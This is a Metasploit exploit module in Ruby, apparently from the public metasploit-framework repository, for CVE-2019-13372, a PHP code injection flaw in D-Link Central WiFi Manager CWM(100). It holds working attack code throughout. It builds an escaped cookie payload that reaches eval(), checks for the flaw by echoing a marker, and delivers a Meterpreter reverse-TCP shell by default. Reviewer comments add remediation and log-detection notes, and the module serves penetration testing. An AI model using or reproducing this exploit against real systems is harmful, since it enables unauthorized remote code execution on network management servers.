

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/dlink_central_wifimanager_rce.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  # AutoCheck makes the framework call #check ahead of #exploit; HttpClient
  # supplies send_request_cgi, normalize_uri and target_uri used below.
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata for CVE-2019-13372 and the TARGETURI option.
  #
  # Reviewer notes taken from the metadata itself:
  # * Affected builds are those below `v1.03R0100_BETA6` (per the Description);
  #   moving to that build or later is presumably the remediation -- confirm
  #   against the vendor advisory.
  # * 'SideEffects' is IOC_IN_LOGS, i.e. the module declares that a run leaves
  #   indicators in logs on the target.
  # * The defaults assume the management UI is served over TLS on port 443.
  #
  # @param info [Hash] metadata handed in by the framework and merged through update_info
  def initialize(info = {})
    metadata = {
      'Name' => 'D-Link Central WiFi Manager CWM(100) RCE',
      'Description' => %q{
        This module exploits a PHP code injection vulnerability in D-Link Central WiFi Manager CWM(100)
        versions below `v1.03R0100_BETA6`. The vulnerability exists in the
        username cookie, which is passed to `eval()` without being sanitized.
        Dangerous functions are not disabled by default, which makes it possible
        to get code execution on the target.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'M3@ZionLab from DBAppSecurity', # Original discovery
        'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # PoC, metasploit module
      ],
      'References' => [
        ['CVE', '2019-13372'],
        ['URL', 'https://unh3x.github.io/2019/02/21/D-link-(CWM-100)-Multiple-Vulnerabilities/']
      ],
      'Targets' => [['Automatic', {}]],
      'DefaultTarget' => 0,
      'DefaultOptions' => {
        'PAYLOAD' => 'php/meterpreter/reverse_tcp',
        'SSL' => true,
        'RPORT' => 443
      },
      'Platform' => ['php'],
      'Arch' => [ARCH_PHP],
      'DisclosureDate' => '2019-07-09',
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [IOC_IN_LOGS],
        'Reliability' => [REPEATABLE_SESSION]
      }
    }
    super(update_info(info, metadata))

    base_path = OptString.new('TARGETURI', [true, 'The base path to to the web application', '/'])
    register_options([base_path])
  end

  # Issues a single GET for index.php/Index/index under TARGETURI with +cmd+
  # embedded in the `username` cookie (the value the Description says reaches
  # `eval()` unsanitized).
  #
  # Detection note: the resulting cookie value opens with a single quote and
  # carries `%3b`-delimited PHP; every ';' and whitespace character inside
  # +cmd+ is percent-encoded as well. Whether this is visible in logs depends
  # on cookie headers being recorded by the web server or an inspecting proxy.
  #
  # @param cmd [String] PHP statement(s) to place in the cookie
  # @return [String, nil] the part of the response body that precedes the first
  #   "<!DOCTYPE html>" (case-insensitive); nil when no response arrives or the
  #   marker is absent
  def inject_php(cmd)
    # ';' and whitespace are rewritten as two-digit lowercase hex escapes.
    escaped = cmd.gsub(/[;\s]/) { |ch| "%#{ch.ord.to_s(16).rjust(2, '0')}" }
    cookie_value = "',0,\"\",1,\"0\")%3b#{escaped}%3b//\""

    response = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri, 'index.php', 'Index', 'index'),
      'cookie' => "username=#{cookie_value};password="
    )
    return nil unless response

    # Output of the injected code is expected ahead of the page's doctype.
    response.body[/^(.*?)<!DOCTYPE html>/mi, 1]
  end

  # Probes the target by asking it to echo a random 4-10 character
  # alphanumeric marker through #inject_php.
  #
  # @return [Exploit::CheckCode] Vulnerable when the text ahead of the doctype,
  #   after chomp, equals the marker; Unknown in every other case, including
  #   when no response was received
  def check
    marker = Rex::Text.rand_text_alphanumeric(rand(4..10))
    echoed = inject_php("echo \"#{marker}\"")&.chomp
    return Exploit::CheckCode::Vulnerable if echoed == marker

    Exploit::CheckCode::Unknown
  end

  # Hands the raw bytes of the selected payload to #inject_php; the returned
  # response text is not inspected here.
  def exploit
    inject_php(payload.raw)
  end
end